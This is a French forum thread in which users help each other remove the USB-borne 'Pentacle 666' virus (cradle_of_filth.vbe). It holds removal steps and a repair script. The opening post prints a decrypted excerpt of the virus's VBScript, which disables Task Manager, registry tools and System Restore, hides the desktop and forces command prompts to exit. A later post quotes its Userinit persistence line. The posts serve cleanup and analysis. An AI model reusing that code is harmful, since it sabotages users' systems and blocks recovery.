Pentacle 666 : virus trojan
Résolu/Fermé27 réponses
j'ai trouvé le virus en question, le fichier etait cradle of filth.vbe, apres decrytpion avec le srcdec18, voila une partie du code que je pense utile pour les qui veulent aider
Shells.Regdelete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\MS32DLL"
icone = Shells.RegRead ("HKCR\Directory\DefaultIcon\">
Shells.RegWrite "HKCR\VBEfile\DefaultIcon\",icone,"REG_EXPAND_SZ"
Shells.RegWrite "HKLM\SOFTWARE\Microsoft\Command Processor\EnableExtensions",1,"REG_DWORD" Shells.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoChangeStartMenu",1,"REG_DWORD"
Shells.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoClose",1,"REG_DWORD"
Shells.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoComputersNearMe",1,"REG_DWORD" Shells.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDesktop",1,"REG_DWORD"
Shells.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrive",1,"REG_DWORD"
Shells.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDriveAutoRun",1,"REG_DWORD"
Shells.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDriveTypeAutoRun",1,"REG_DWORD"
Shells.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFileMenu",1,"REG_DWORD"
Shells.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoHardwareTab",1,"REG_DWORD"
Shells.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRecentDocsHistory",1,"REG_DWORD"
Shells.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRecentDocsMenu",1,"REG_DWORD"
Shells.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoResolveSearch",1,"REG_DWORD"
Shells.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoShellSearchButton",1,"REG_DWORD"
Shells.RegWrite "HKLM\Software\Microsoft\Command Processor\AutoRun","exit","REG_SZ"
Shells.RegWrite "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore\DisableSR",1,"REG_DWORD"
Shells.RegWrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\HideFileExt\UncheckedValue",1,"REG_DWORD"
Shells.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr",1,"REG_DWORD"
Shells.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools",1,"REG_DWORD"
Shells.RegWrite "HKCU\Control Panel\Mouse\DoubleClickSpeed",4000,"REG_SZ"
Shells.RegWrite "HKCU\Control Panel\Mouse\MouseSpeed",10,"REG_SZ"
Set f = Fso.CreateTextFile("C:\Windows\Desktop.ini", True)
f.WriteLine "[.ShellClassInfo]"
f.WriteLine "Clsid={645FF040-5081-101B-9F08-00AA002F954E}"
f.Close
Set f1 = Fso.GetFolder("C:\Windows")
f1.Attributes = 4
f1.Close
Shells.Regdelete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\MS32DLL"
icone = Shells.RegRead ("HKCR\Directory\DefaultIcon\">
Shells.RegWrite "HKCR\VBEfile\DefaultIcon\",icone,"REG_EXPAND_SZ"
Shells.RegWrite "HKLM\SOFTWARE\Microsoft\Command Processor\EnableExtensions",1,"REG_DWORD" Shells.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoChangeStartMenu",1,"REG_DWORD"
Shells.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoClose",1,"REG_DWORD"
Shells.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoComputersNearMe",1,"REG_DWORD" Shells.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDesktop",1,"REG_DWORD"
Shells.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrive",1,"REG_DWORD"
Shells.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDriveAutoRun",1,"REG_DWORD"
Shells.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDriveTypeAutoRun",1,"REG_DWORD"
Shells.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFileMenu",1,"REG_DWORD"
Shells.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoHardwareTab",1,"REG_DWORD"
Shells.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRecentDocsHistory",1,"REG_DWORD"
Shells.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRecentDocsMenu",1,"REG_DWORD"
Shells.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoResolveSearch",1,"REG_DWORD"
Shells.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoShellSearchButton",1,"REG_DWORD"
Shells.RegWrite "HKLM\Software\Microsoft\Command Processor\AutoRun","exit","REG_SZ"
Shells.RegWrite "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore\DisableSR",1,"REG_DWORD"
Shells.RegWrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\HideFileExt\UncheckedValue",1,"REG_DWORD"
Shells.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr",1,"REG_DWORD"
Shells.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools",1,"REG_DWORD"
Shells.RegWrite "HKCU\Control Panel\Mouse\DoubleClickSpeed",4000,"REG_SZ"
Shells.RegWrite "HKCU\Control Panel\Mouse\MouseSpeed",10,"REG_SZ"
Set f = Fso.CreateTextFile("C:\Windows\Desktop.ini", True)
f.WriteLine "[.ShellClassInfo]"
f.WriteLine "Clsid={645FF040-5081-101B-9F08-00AA002F954E}"
f.Close
Set f1 = Fso.GetFolder("C:\Windows")
f1.Attributes = 4
f1.Close
Bonjour Lery an,
Voilà mon blem,
On a aussi attrapé le virus taibe pentacle et on aimerait avoir le code de cradle car dans ton post, nous ne comprenons pas certains variables que tu as mis pour que nous puissions créer un script pour le contrer.
Merci baina. Mets-le en txt pour que çà s'exécute pas sur ma pauvre machine.
Bandy Gasy
Voilà mon blem,
On a aussi attrapé le virus taibe pentacle et on aimerait avoir le code de cradle car dans ton post, nous ne comprenons pas certains variables que tu as mis pour que nous puissions créer un script pour le contrer.
Merci baina. Mets-le en txt pour que çà s'exécute pas sur ma pauvre machine.
Bandy Gasy
gtic007
Messages postés
23
Date d'inscription
vendredi 21 décembre 2007
Statut
Membre
Dernière intervention
27 juillet 2009
2
>
BandyGasy
29 juil. 2008 à 18:20
29 juil. 2008 à 18:20
Mi-télécharger-va notepad ++ lets dé ça marche ah!!! après tu change l'extension en vb.
Une proc pour « nettoyer » ce virus :
1) Insérer la clé USB « vérolée » (eh oui, vous ça se propage entre autres par les clés USB et périphériques du genre).
2) Faire CTRL+MAJ+ECHAP pour faire afficher le gestionnaire de tâches. Aller dans l’onglet « Processus » et tuer tous les processus s’appelant « WSCRIPT.EXE » (pour ça, trouver dans la colonne de gauche « WSCRIPT.EXE », faire un clic droit dessus et faire « Terminer le processus ».
3) Via l’Explorateur Windows (ou le Poste de Travail), aller dans la clé USB (E: par exemple), puis dans le menu « Outils », choisir « Options des dossiers », aller dans l’onglet « Affichage » et :
- Cocher « Afficher les fichiers et les dossiers cachés ».
- Décocher « Masquer les extensions des fichiers dont le type est connu ».
4) Deux fichiers sont apparus sur la clé USB : autorun.inf et cradle_of_filth.vbe. Supprimer ces deux fichiers.
5) Via l’explorateur, aller dans C:\WINDOWS\System32 (ou C:\WINNT\System32). Supprimer là aussi cradle_of_filth.vbe. S’il n’est pas là, vérifier, comme pour la clé USB que le fichier n’est pas caché ! (si nécessaire, refaire la manip « Outils », « Options des dossiers », …
6) Là ça se complique un peu… Dans le menu « Démarrer » de Windows, taper « regedit ». Dans la colonne de gauche de l’éditeur de base de registre, sélectionner « Poste de Travail », puis aller dans le menu « Edition » et choisir « Rechercher… ». Cocher « Clés », « Valeurs » et « Données » et rechercher le mot « cradle ».
Quand un résultat est trouvé :
- Soit la valeur trouvée s’appelle « (par défaut) » (dans la partie de droite). Dans ce cas, double-cliquer dessus et dans la petite fenêtre qui apparaît, supprimer tout le texte.
- Soit la valeur s’appelle « Userinit », et dans ce cas, supprimer uniquement la fin, c’est-à-dire :
« C:\Windows\system32\RunDLL32.EXE Shell32.DLL,ShellExec_RunDLL wscript.exe cradle_of_filth.vbe ».
Il doit donc rester qqc comme :
« C:\Windows\system32\userinit.exe, » (la virgule à la fin est volontaire).
Ne surtout pas supprimer complètement les données, sous peine de ne plus pouvoir ouvrir de session !
7) Le virus est maintenant enlevé (attention, vous pouvez toujours être infecté à nouveau par exemple par une clé USB infectée !).
Il faut maintenant faire un copier-coller du script suivant dans un notepad :
Option Explicit
Dim WshShell
Set WshShell = WScript.CreateObject("WScript.Shell")
On Error Resume Next
WshShell.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDriveTypeAutoRun", 145, "REG_DWORD"
WshShell.RegWrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\HideFileExt\UncheckedValue",0,"REG_DWORD"
WshShell.RegDelete "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoChangeStartMenu"
WshShell.RegDelete "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoClose"
WshShell.RegDelete "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoComputersNearMe"
WshShell.RegDelete "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDesktop"
WshShell.RegDelete "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrive"
WshShell.RegDelete "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDriveAutoRun"
WshShell.RegDelete "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFileMenu"
WshShell.RegDelete "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoHardwareTab"
WshShell.RegDelete "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRecentDocsHistory"
WshShell.RegDelete "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRecentDocsMenu"
WshShell.RegDelete "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoResolveSearch"
WshShell.RegDelete "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoShellSearchButton"
WshShell.RegDelete "HKLM\Software\Microsoft\Command Processor\AutoRun"
WshShell.RegDelete "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore\DisableSR"
On Error Goto 0
... Enregistrer ce fichier avec un nom comme "repare.vbs" (n'oubliez pas les guillemets dans notepad, sinon il vous rajoutera une extension .txt !!!), et le lancer en double-cliquant dessus.
Fermer la session et la rouvrir. Le bureau doit être revenu avec ses icônes et il doit être à nouveau possible d’éteindre l’ordinateur depuis le menu « Démarrer ».
PS : éventuellement, vider la poubelle au cas où les fichiers supprimés dans les étapes 4 et 5 y seraient encore !!! ;o)
PPS : merci ileiry : sans ton aide, j'aurais galéré encore plus pour trouver les modifs (eh oui, il a frappé chez moi :( ).
1) Insérer la clé USB « vérolée » (eh oui, vous ça se propage entre autres par les clés USB et périphériques du genre).
2) Faire CTRL+MAJ+ECHAP pour faire afficher le gestionnaire de tâches. Aller dans l’onglet « Processus » et tuer tous les processus s’appelant « WSCRIPT.EXE » (pour ça, trouver dans la colonne de gauche « WSCRIPT.EXE », faire un clic droit dessus et faire « Terminer le processus ».
3) Via l’Explorateur Windows (ou le Poste de Travail), aller dans la clé USB (E: par exemple), puis dans le menu « Outils », choisir « Options des dossiers », aller dans l’onglet « Affichage » et :
- Cocher « Afficher les fichiers et les dossiers cachés ».
- Décocher « Masquer les extensions des fichiers dont le type est connu ».
4) Deux fichiers sont apparus sur la clé USB : autorun.inf et cradle_of_filth.vbe. Supprimer ces deux fichiers.
5) Via l’explorateur, aller dans C:\WINDOWS\System32 (ou C:\WINNT\System32). Supprimer là aussi cradle_of_filth.vbe. S’il n’est pas là, vérifier, comme pour la clé USB que le fichier n’est pas caché ! (si nécessaire, refaire la manip « Outils », « Options des dossiers », …
6) Là ça se complique un peu… Dans le menu « Démarrer » de Windows, taper « regedit ». Dans la colonne de gauche de l’éditeur de base de registre, sélectionner « Poste de Travail », puis aller dans le menu « Edition » et choisir « Rechercher… ». Cocher « Clés », « Valeurs » et « Données » et rechercher le mot « cradle ».
Quand un résultat est trouvé :
- Soit la valeur trouvée s’appelle « (par défaut) » (dans la partie de droite). Dans ce cas, double-cliquer dessus et dans la petite fenêtre qui apparaît, supprimer tout le texte.
- Soit la valeur s’appelle « Userinit », et dans ce cas, supprimer uniquement la fin, c’est-à-dire :
« C:\Windows\system32\RunDLL32.EXE Shell32.DLL,ShellExec_RunDLL wscript.exe cradle_of_filth.vbe ».
Il doit donc rester qqc comme :
« C:\Windows\system32\userinit.exe, » (la virgule à la fin est volontaire).
Ne surtout pas supprimer complètement les données, sous peine de ne plus pouvoir ouvrir de session !
7) Le virus est maintenant enlevé (attention, vous pouvez toujours être infecté à nouveau par exemple par une clé USB infectée !).
Il faut maintenant faire un copier-coller du script suivant dans un notepad :
Option Explicit
Dim WshShell
Set WshShell = WScript.CreateObject("WScript.Shell")
On Error Resume Next
WshShell.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDriveTypeAutoRun", 145, "REG_DWORD"
WshShell.RegWrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\HideFileExt\UncheckedValue",0,"REG_DWORD"
WshShell.RegDelete "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoChangeStartMenu"
WshShell.RegDelete "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoClose"
WshShell.RegDelete "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoComputersNearMe"
WshShell.RegDelete "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDesktop"
WshShell.RegDelete "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrive"
WshShell.RegDelete "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDriveAutoRun"
WshShell.RegDelete "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFileMenu"
WshShell.RegDelete "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoHardwareTab"
WshShell.RegDelete "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRecentDocsHistory"
WshShell.RegDelete "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRecentDocsMenu"
WshShell.RegDelete "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoResolveSearch"
WshShell.RegDelete "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoShellSearchButton"
WshShell.RegDelete "HKLM\Software\Microsoft\Command Processor\AutoRun"
WshShell.RegDelete "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore\DisableSR"
On Error Goto 0
... Enregistrer ce fichier avec un nom comme "repare.vbs" (n'oubliez pas les guillemets dans notepad, sinon il vous rajoutera une extension .txt !!!), et le lancer en double-cliquant dessus.
Fermer la session et la rouvrir. Le bureau doit être revenu avec ses icônes et il doit être à nouveau possible d’éteindre l’ordinateur depuis le menu « Démarrer ».
PS : éventuellement, vider la poubelle au cas où les fichiers supprimés dans les étapes 4 et 5 y seraient encore !!! ;o)
PPS : merci ileiry : sans ton aide, j'aurais galéré encore plus pour trouver les modifs (eh oui, il a frappé chez moi :( ).
Bonjour,
Je viens d'attraper ce foutu virus pentacle 666.
Merci pour tes instructions, seulement, quand j'exécutre le CTRL+MAJ+ECHAP : il me dit que je ne suis pas autorisé à éditer le gestionnaire de tâches car c'est bloqué par mon administrateur.
Comment faire pour cela?
Je veux te demander aussi : c'est quoi clé usb VEROLEE?
Merci
Je viens d'attraper ce foutu virus pentacle 666.
Merci pour tes instructions, seulement, quand j'exécutre le CTRL+MAJ+ECHAP : il me dit que je ne suis pas autorisé à éditer le gestionnaire de tâches car c'est bloqué par mon administrateur.
Comment faire pour cela?
Je veux te demander aussi : c'est quoi clé usb VEROLEE?
Merci
Samy010976
Messages postés
16
Date d'inscription
lundi 28 février 2005
Statut
Membre
Dernière intervention
14 avril 2009
>
radzo
4 juil. 2008 à 10:19
4 juil. 2008 à 10:19
Bonjour,
1- Une clé USB vérolée --> une clé USB ou un flash disk qui a été infecté par un virus
2- Pour solutionner ce supposé blocage par l'Administrateur, recherche sur google le logiciel registrar manager, te permettant d'accéder à ta base de registre car ce sont des valeurs là-bas qu'il faut modifier. De nombreux post y afférents sont aussi disponibles sur le net, à toi de piocher un peu.
Bonne continuation.
1- Une clé USB vérolée --> une clé USB ou un flash disk qui a été infecté par un virus
2- Pour solutionner ce supposé blocage par l'Administrateur, recherche sur google le logiciel registrar manager, te permettant d'accéder à ta base de registre car ce sont des valeurs là-bas qu'il faut modifier. De nombreux post y afférents sont aussi disponibles sur le net, à toi de piocher un peu.
Bonne continuation.
radzo
>
Samy010976
Messages postés
16
Date d'inscription
lundi 28 février 2005
Statut
Membre
Dernière intervention
14 avril 2009
10 juil. 2008 à 16:35
10 juil. 2008 à 16:35
Merci pour les conseils.
Ca y est, le satané virus est parti de mon PC, seulement, il a encore laissé qlq chose.
En fait, je n'arrive pas encore à utiliser l'invite de commandes, même si j'ai déjà modifié la valeur du clé correspondant dans le registre.
Ensuite, lorsque je démarre mon ordi, il y a un message qui dit que le système ne trouve pas le fichier cradle_of_filth.vbe dans C:\WinNT\system32.
Merci encore pour vos éventuelles réponses.
Ca y est, le satané virus est parti de mon PC, seulement, il a encore laissé qlq chose.
En fait, je n'arrive pas encore à utiliser l'invite de commandes, même si j'ai déjà modifié la valeur du clé correspondant dans le registre.
Ensuite, lorsque je démarre mon ordi, il y a un message qui dit que le système ne trouve pas le fichier cradle_of_filth.vbe dans C:\WinNT\system32.
Merci encore pour vos éventuelles réponses.
Salut, j'ai moi aussi ce virus, j'ai donc essayé d'appliquer ta solution mais pb aux étapes 3 et 5 : le fichier cradle.. n'apparait nul part même après avoir décoché les cases ds outils/options..
quand je fait rechercher, il ne trouve pas de cradle mais ds c: windows syst 32, ds Regedit je vois apparaître le cradle en question
qu'est ce que je peux faire help ???
merci
quand je fait rechercher, il ne trouve pas de cradle mais ds c: windows syst 32, ds Regedit je vois apparaître le cradle en question
qu'est ce que je peux faire help ???
merci
Vous n’avez pas trouvé la réponse que vous recherchez ?
Posez votre question
Kaspersky int. security 6, mais il ne trouve aucune menace, après analyse
J'ai ausi utilisé spybot, sans succès
J'ai ausi utilisé spybot, sans succès
PPPS :
Remplacez les
"
que vous trouverez dans mon script par des guillemets ( " ) : c'est le site qui a fait cette modif ! :(
Remplacez les
"
que vous trouverez dans mon script par des guillemets ( " ) : c'est le site qui a fait cette modif ! :(
et lorsque on va vers la panneau de config , que l'on n'a pas "options de dossiers" et simplement "synchroniser"
il existe un clé de registre a taper pour changer la config: pourrais tu me la donner stp? merci
il existe un clé de registre a taper pour changer la config: pourrais tu me la donner stp? merci
Jays : attention a la ligne 12 du script, il existe un -; qu'il faut eliminer pour que le programme fonctionne sinon il y a erreur de script: Me suis trompé?? salutations
Samy010976
Messages postés
16
Date d'inscription
lundi 28 février 2005
Statut
Membre
Dernière intervention
14 avril 2009
4 juil. 2008 à 09:55
4 juil. 2008 à 09:55
Cette solution est encore partielle.
Si vous allez dans le dossier Windows, vous verrez que l'icône est devenu un icône de la Corbeille. De même, si vous supprimer un truc, çà ira tant dans le dossier de la Corbeille que dans Windows.
En fait, je ne suis pas encore sûr que ce soit pour tous les Windows, le mien est Windows XP (SP2).
Si quelqu'un pourrait m'envoyer ou mettre en ligne le script de ce put.... de virus, nous sommes (pas nous seulement, vous aussi) prêt à faire un petit logiciel pour le contrer à tout moment. On en a déjà fait pour les autres genres Raila Odinga ...
Merci à toutes les bonnes volontés pour éradiquer ce genre de truc.
PS : J'ai déjà demandé ce script à Ileiry mais sous le pseudo BandyGasy. Encore MERCI A TOUS
Si vous allez dans le dossier Windows, vous verrez que l'icône est devenu un icône de la Corbeille. De même, si vous supprimer un truc, çà ira tant dans le dossier de la Corbeille que dans Windows.
En fait, je ne suis pas encore sûr que ce soit pour tous les Windows, le mien est Windows XP (SP2).
Si quelqu'un pourrait m'envoyer ou mettre en ligne le script de ce put.... de virus, nous sommes (pas nous seulement, vous aussi) prêt à faire un petit logiciel pour le contrer à tout moment. On en a déjà fait pour les autres genres Raila Odinga ...
Merci à toutes les bonnes volontés pour éradiquer ce genre de truc.
PS : J'ai déjà demandé ce script à Ileiry mais sous le pseudo BandyGasy. Encore MERCI A TOUS
Bonjour,
apparemment j'ai un problème similaire.
Le début de la solution de Jays a l'air très bien, simple, et bien expliqué. Mais je bloque à l'étape 6) regedit.
Voici ce qui m'est affiché quand je double click sur "(par défaut)"
[URL=https://imageshack.com/][IMG]http://img71.imageshack.us/img71/8995/cradlekr3.th.jpg[/IMG][/URL]
J'ai rien à supprimer...
De plus, je dois m'occuper des 000, 001 et 002 aussi? Comment (vu qu'ils ont en données du "cradle" ou du "esta")
Merci beaucoup pour le complément!
apparemment j'ai un problème similaire.
Le début de la solution de Jays a l'air très bien, simple, et bien expliqué. Mais je bloque à l'étape 6) regedit.
Voici ce qui m'est affiché quand je double click sur "(par défaut)"
[URL=https://imageshack.com/][IMG]http://img71.imageshack.us/img71/8995/cradlekr3.th.jpg[/IMG][/URL]
J'ai rien à supprimer...
De plus, je dois m'occuper des 000, 001 et 002 aussi? Comment (vu qu'ils ont en données du "cradle" ou du "esta")
Merci beaucoup pour le complément!
nanata
Messages postés
1
Date d'inscription
samedi 5 juillet 2008
Statut
Membre
Dernière intervention
5 juillet 2008
5 juil. 2008 à 17:24
5 juil. 2008 à 17:24
Je cherche aussi la solution pour remettre mon dossiers windows en place. Le script marche tres bien mais il reste le windows devenu corbeille qui gène.
Samy010976
>
nanata
Messages postés
1
Date d'inscription
samedi 5 juillet 2008
Statut
Membre
Dernière intervention
5 juillet 2008
10 juil. 2008 à 17:13
10 juil. 2008 à 17:13
Pour remettre en place windows :
- Tu lances ta commande msdos
- Tu te mets dans le répertoire windows\system32 (cd windows\system32
- Tu fais attrib -s c:\windows
Ton windows reviendra à toi.
- Tu lances ta commande msdos
- Tu te mets dans le répertoire windows\system32 (cd windows\system32
- Tu fais attrib -s c:\windows
Ton windows reviendra à toi.
je pense qu'il fallait, pour vous qui ecrivent des script VB, renverser le code dans le virus qui dit :
.........
Set f1 = Fso.GetFolder("C:\Windows")
f1.Attributes = 4
f1.Close
.........
.........
Set f1 = Fso.GetFolder("C:\Windows")
f1.Attributes = 4
f1.Close
.........
Samy010976
Messages postés
16
Date d'inscription
lundi 28 février 2005
Statut
Membre
Dernière intervention
14 avril 2009
10 juil. 2008 à 17:22
10 juil. 2008 à 17:22
Est-ce que tu peux mettre le code complet de cradle ici ???
Merci de ton aide.
Merci de ton aide.
Bonjour ! Moi aussi j'ai eu ce virus !
Au début je ne savais pas définir ce que c'était et en faisant quelques recherches j'ai trouvé un programme sympa pour remettre les valeurs initiales qui ont été modifiés dans le regedit, à cause de ce virus qui les modifie. Voici le lien pour le télécharger Zeb Restore http://telechargement.zebulon.fr/zeb-restore.html
Après tout était ok j'avais de nouveau mon bureau, je pouvais faire une restauration du système et éteindre mon PC sans soucis mais j'avais ce message quand j'allumais mon PC comme quoi il ne trouvait pas le fichier cradle_of_filth.vbl donc j'ai encore cherché sur le net avec ce message et j'ai trouvé que c'était ce virus lque vous mentionnez et j'ai suivi le tuto ci dessus ! Maintenant plus de soucis !
Mais si vous avez des soucis comme moi dans vos fichiers éffacés qui ne vont pas dans votre corbeille, où pas de clique droit dans le menu démarrer je vous conseille d'utiliser Zeb Restore en complément !
J'espère avoir pû aider et merci pour les solutions proposées !
Au début je ne savais pas définir ce que c'était et en faisant quelques recherches j'ai trouvé un programme sympa pour remettre les valeurs initiales qui ont été modifiés dans le regedit, à cause de ce virus qui les modifie. Voici le lien pour le télécharger Zeb Restore http://telechargement.zebulon.fr/zeb-restore.html
Après tout était ok j'avais de nouveau mon bureau, je pouvais faire une restauration du système et éteindre mon PC sans soucis mais j'avais ce message quand j'allumais mon PC comme quoi il ne trouvait pas le fichier cradle_of_filth.vbl donc j'ai encore cherché sur le net avec ce message et j'ai trouvé que c'était ce virus lque vous mentionnez et j'ai suivi le tuto ci dessus ! Maintenant plus de soucis !
Mais si vous avez des soucis comme moi dans vos fichiers éffacés qui ne vont pas dans votre corbeille, où pas de clique droit dans le menu démarrer je vous conseille d'utiliser Zeb Restore en complément !
J'espère avoir pû aider et merci pour les solutions proposées !
Salut à tous , merci pour tous vos conseils j'ai reussi à virer le virus de mon PC grace a un patch que j'ai touvé sur net studio .org et même que j'ai eu d'autres virus mais ils sont tous partis ouffff, je me suis aussi procuré une longue license pour antivir premium jusqu a 2012 mais mon dernier souci est qu il y a un virus ou je ne sais pas quoi qui est toujours là mais que je n'arrive pas à eradiquer même après formatage ça s appelle "flashguard.exe" qui s execute automatiquement dès que je demarre et il me dit qu il n y a pas de disque dans le lecteur... harddrive..... quelque chose comme ça et aussi après le formatage il y a eu des dossiers que je n arrive plus à ouvrir dans D:\ il me dit que le disque est protegé ou que l accès est juste refusé. venez moi en aide vonjeo zala fa ny kandrako manontolo no taraiky ao merci d'avance
Samy010976
Messages postés
16
Date d'inscription
lundi 28 février 2005
Statut
Membre
Dernière intervention
14 avril 2009
29 août 2008 à 10:23
29 août 2008 à 10:23
Bonjour,
Raphael, si tu trouves des solutions sur flashguard.exe, tu m'écris car j'ai le même problème que toi avec 2 flash disk mais le mien est DriveGuard.exe. Impossible de copier mes fichiers des clés ni de formater les flashs, d'ailleurs l'une de ces flash est devenue un système de fichier RAW (au lieu de FAT ou NTFS).
Aza adino ny bandy baina a.
Merci à vous tous.
Raphael, si tu trouves des solutions sur flashguard.exe, tu m'écris car j'ai le même problème que toi avec 2 flash disk mais le mien est DriveGuard.exe. Impossible de copier mes fichiers des clés ni de formater les flashs, d'ailleurs l'une de ces flash est devenue un système de fichier RAW (au lieu de FAT ou NTFS).
Aza adino ny bandy baina a.
Merci à vous tous.
raphael
>
Samy010976
Messages postés
16
Date d'inscription
lundi 28 février 2005
Statut
Membre
Dernière intervention
14 avril 2009
29 août 2008 à 14:40
29 août 2008 à 14:40
salut à tous le virus j'ai encore le virus flashguard.exe mais il s appelle aussi driveguard.exe c la même chose il y a des solutions sur le net mais je ne suis pas un crack en info alors je ne comprends pas très bien ce qu il faut faire. S il existe un patch dites le moi et sinon donnez moi aussi une solution plus evidente.
Taibe ry zalah fa tena tsy koboko koa nefa ra matôs mbola tsy misy azy fa misy avg mis à jour ohatra de hitany le izy sady ataony simba mitsy. masoso..... maninona ary ra tsy mamorona zavatra tsy manjary ohatr'ireny.tsss...le
Taibe ry zalah fa tena tsy koboko koa nefa ra matôs mbola tsy misy azy fa misy avg mis à jour ohatra de hitany le izy sady ataony simba mitsy. masoso..... maninona ary ra tsy mamorona zavatra tsy manjary ohatr'ireny.tsss...le
Samy010976
Messages postés
16
Date d'inscription
lundi 28 février 2005
Statut
Membre
Dernière intervention
14 avril 2009
>
raphael
1 sept. 2008 à 07:47
1 sept. 2008 à 07:47
Salut,
Comme je l'ai dit, ce sont mes flash disk qui sont infectés par DriveGuard.exe.
Après avoir cherché sur le net, j'ai lu un truc qui consistait à récupérer un disque dur à l'aide d'un outil présent dans Partition Magic (PTEDIT32.EXE).
Voici ce que j'ai fait, je le répète, CE SONT DES FLASHS DISKS QUI SONT INFECTES POUR MOI (le système de fichier est devenu RAW, impossible de faire des copies, impossible d'ouvrir les fichiers):
1- J'ai connecté un flash disk SAIN de même taille que celui qui est infecté. Il faut au préalable supprimer tout ce qu'il contient pour qu'il soit VIERGE.
2- Je lance PTEDIT32.EXE qui se trouve dans le répertoire de Partition Magic
3- Je sélectionne LE FLASH DISK dans la zone Hard Disk
4- Je fais un ImprEcran (Imprime Ecran) du tableau qui s'affiche
5- Je sauve cet image sur le Bureau pour que je puisse y accéder rapidement
6- Je clique maintenant sur Boot Record (un bouton en bas de la fenêtre de PTEDIT32)
7- Je fais aussi un ImprEcran de la fenêtre qui s'affiche, je sauve aussi sur mon Bureau
8- Je DECONNECTE LE FLASH SAIN
9- Je CONNECTE LE FLASH DETRUIT
10- J'ouvre les images enregistrés sur mon bureau.
11- J'applique les valeurs se trouvant sur ces images pour mon flash détruit.
12- Le flash redevient normal MAIS IL NE FAUT SURTOUT PAS KLE FORMATER. CONTENTEZ VOUS DE SUPPRIMER SEULEMENT LES FICHIERS QU'IL CONTIENT MAIS PAS DE FORMATAGE SINON LE SYSTEME DE FICHIER REDEVIENDRA RAW
